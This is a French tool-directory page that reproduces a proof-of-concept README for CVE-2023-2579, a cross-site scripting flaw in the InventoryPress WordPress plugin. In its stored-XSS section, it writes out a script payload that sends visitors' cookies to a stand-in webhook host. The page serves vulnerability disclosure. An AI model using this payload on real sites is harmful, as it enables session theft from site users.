Skip to content
KitploitKITPLOIT
OutilsExploitsBlog
Log in
Soumettre
OutilsExploitsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

FluxContactConfidentialité© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Outils/GitHubGitHub/0xn4d/poc-cve-xss-inventory-press-plugin
Analyse des VulnérabilitésExploitationExploitation d'Applications WebSécurité WebTests d'IntrusionDéveloppement de Charges Utiles
GitHub0xn4d/poc-cve-xss-inventory-press-plugin

poc-cve-xss-inventory-press-plugin

Preuve de concept pour CVE-2023-2579

Voir le dépôt
12il y a 3 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Mise à jour - 23-06-2023

L'identifiant CVE-2023-2579 a été réservé et le PoC a été publié sur le site WPScan : https://wpscan.com/vulnerability/3cfcb8cc-9c4f-409c-934f-9f3f043de6fe

Détails

Titre : Cross-Site Scripting Réfléchi Authentifié dans le plugin InventoryPress pour WordPress CMS
Date : 2023-04-21
Auteur : Danilo Albuquerque
Site du fournisseur : https://wordpress.org
Lien du logiciel : https://wordpress.org/download
Version : WordPress 6.2
Nom et version du plugin : InventoryPress 1.7
Testé sur : Brave (Version 1.50.119 Chromium: 112.0.5615.121 (Version officielle) 64 bits)

PoC pour la vulnérabilité XSS Réfléchi dans InventoryPress 1.7

  1. Allez sur la page où vous pouvez ajouter des articles dans l'inventaire ;
  2. Ajoutez la charge utile malveillante dans le champ « Description » du formulaire ;
  3. Accédez au lien du nouvel article généré par le plugin ;

Lorsque vous faites tout cela et que vous mettez à jour la page actuelle, une fenêtre contextuelle d'alerte apparaîtra avec le message correspondant.

Captures d'écran ci-dessous

  1. Allez sur la page où vous pouvez ajouter des articles dans l'inventaire :
    image

  2. Ajoutez la charge utile malveillante dans le champ « Description » du formulaire :
    image

  3. Accédez au lien du nouvel article généré par le plugin :
    image

  4. Une fois la requête effectuée, la fenêtre contextuelle d'alerte s'affiche :
    image

Bonus - PoC pour XSS Stocké

  1. Ajoutez la charge utile suivante pour voler les cookies dans le champ « Description » : <script>fetch('https://webhooksite-to-get-the-request', {method: 'POST',mode: 'no-cors',body:document.cookie});</script>. Ensuite, publiez le nouvel article, ou mettez à jour un ancien ;

  2. Déclenchez et récupérez les identifiants sur le site Webhook

  3. Ajout de la charge utile et publication de l'article (ou mise à jour) : image

  4. Déclenchement et récupération des identifiants : image

Télécharger l’outil